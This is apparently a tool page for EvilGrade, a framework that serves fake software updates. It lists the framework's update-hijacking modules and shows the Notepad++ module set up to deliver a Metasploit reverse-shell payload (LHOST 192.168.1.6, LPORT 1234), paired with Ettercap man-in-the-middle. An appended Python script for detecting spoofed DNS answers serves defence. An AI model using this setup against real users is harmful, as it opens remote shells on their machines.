EvilGrade

Description

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and its own WebServer and DNSServer modules. New settings are easy to set up, and it auto-configures when new binary agents are set. It is part of the Cyborg Linux spoofing toolkit.

Example

List available modules:

            _ _                     _      
           (_) |                   | |     
  _____   ___| | __ _ _ __ __ _  __| | ___ 
 / _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \ 
|  __/\ V /| | | (_| | | | (_| | (_| |  __/ 
 \___| \_/ |_|_|\__, |_|  \__,_|\__,_|\___| 
                __/ |                      
                |___/ 
-------------------------------------------
---------------------  www.infobytesec.com 
- 63 modules available.

evilgrade>show modules

List of modules:
===============

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.

Select a module, in this case notepadplus:

evilgrade>configure notepadplus
evilgrade(notepadplus)>show options

Display options:
===============

Name = notepadplus
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = "The notepad++ use GUP generic update process so it''s boggy too."
VirtualHost = "notepad-plus.sourceforge.net"

.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable |                 1 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'

evilgrade(notepadplus)>

Set the agent to an MSF reverse-connection payload, delivered when someone tries to update notepadplus:

evilgrade(notepadplus)>set agent '["/opt/metasploit/apps/pro/msf3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

Start the EvilGrade server:

evilgrade(notepadplus)>start

Now use Ettercap for MITM and sniffing.
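
Detection-side example, added here and not part of the original page or of EvilGrade: because the framework relies on its DNSServer and a per-module VirtualHost, a resolver log that shows a public update host answered with an internal address is a strong indicator. The log format, the function names and the sample lines are assumptions constructed for this example.

```python
import ipaddress

# Update hosts to watch. This one is the VirtualHost shown in the notepadplus
# module options above; extend with the update hosts of software you run.
WATCHED_HOSTS = {"notepad-plus.sourceforge.net"}

# Address space a public update server should never resolve to.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

def is_watched(qname):
    """True for a watched host or any subdomain of it (case-insensitive)."""
    name = qname.rstrip(".").lower()
    return any(name == h or name.endswith("." + h) for h in WATCHED_HOSTS)

def suspicious_answers(log_lines):
    """Return (client, qname, answer) for watched hosts answered with internal IPs."""
    hits = []
    for line in log_lines:
        fields = line.split()
        # Assumed log format: <time> <client> <qname> <rtype> <answer>
        if len(fields) != 5 or fields[3] != "A":
            continue
        _, client, qname, _, answer = fields
        if not is_watched(qname):
            continue
        try:
            addr = ipaddress.ip_address(answer)
        except ValueError:
            continue  # malformed answer field: skip it rather than crash
        if any(addr in net for net in INTERNAL_NETS):
            hits.append((client, qname.rstrip(".").lower(), answer))
    return hits

# Constructed sample log, not real traffic. 203.0.113.10 is a documentation
# address standing in for the genuine server; 192.168.1.6 is the LHOST value
# from the page, reused here only as a sample internal address.
SAMPLE_LOG = [
    "2017-01-01T10:00:00 192.168.1.20 notepad-plus.sourceforge.net A 203.0.113.10",
    "2017-01-01T10:05:00 192.168.1.21 Notepad-Plus.SourceForge.net. A 192.168.1.6",
    "2017-01-01T10:06:00 192.168.1.21 intranet.example A 192.168.1.5",
    "2017-01-01T10:07:00 192.168.1.22 notepad-plus.sourceforge.net A not-an-ip",
]

if __name__ == "__main__":
    for hit in suspicious_answers(SAMPLE_LOG):
        print("possible spoofed update host:", *hit)
```

Only the second sample line is reported: the first resolves to an external address, the third is not a watched host, and the fourth has an unparseable answer.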
